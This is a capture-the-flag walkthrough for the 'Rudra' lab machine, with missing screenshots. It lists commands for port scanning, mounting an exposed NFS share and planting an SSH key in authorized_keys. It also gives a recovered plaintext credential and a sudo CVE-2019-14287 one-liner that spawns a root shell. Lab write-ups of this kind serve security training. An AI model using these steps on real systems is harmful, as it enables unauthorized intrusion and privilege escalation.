Rudra Walkthrough
We start by scanning the host with nmap -A –T4 –p- 192.168.1.19 –vv
Dirb scan gave this results :
As we can see from nmap there must be a mounted drive that we can list it by showmount –e 192.168.1.19
Ok now we are going to access this drive by entering the following commands :
mkdir shivay
mount -t nfs 192.168.1.19:/home/shivay ~/shivay
mount -t nfs -o vers=3 192.168.1.4:/home/shivay ~/shivay
ls -ld shivay
drwxr-xr-x 2 1002 1002 4096 Oct 21 16:54 shivay
groupadd –gid 2008 shivay_group
useradd –uid 2008 –groups shivay_group shivay_user
Ok I don’t believe this file is useful , now let’s create a ssh folder and copy our keys to it so we can able to ssh to the host, we create .ssh inside the shivay folder and generate new keys:
mkdir shivay/.ssh
cp ~/.ssh/id_rsa.pub shivay/.ssh/authorized_keys
and we got in … nice.
Now using LinEnum.sh script gave us this:
So we connect to mysql by : mysql –u root
Ok we change directory to /media
Ok now we have a file hints and opening it we can find a link to an article and there is another file creds viewing it we can see some emojis … reading the article and following the steps like:
First copy the contents of the file creds to a new file on your machine and save it
Download the git file from the article and then run it.
Select 2) Decloakify a File ( locate the file you saved before ) and then Enter cipher #: 20
And your file will be saver as new name, view it and there is a new username and a password where we can use to login with ssh
The file content mahakaal:kalbhairav
It took me a while and a while to figure it out till I found a link to this exploit
https://blog.aquasec.com/cve-2019-14287-sudo-linux-vulnerability
sudo -u#-1 watch -x sh -c ‘reset; exec sh 1>&0 2>&0’ –u
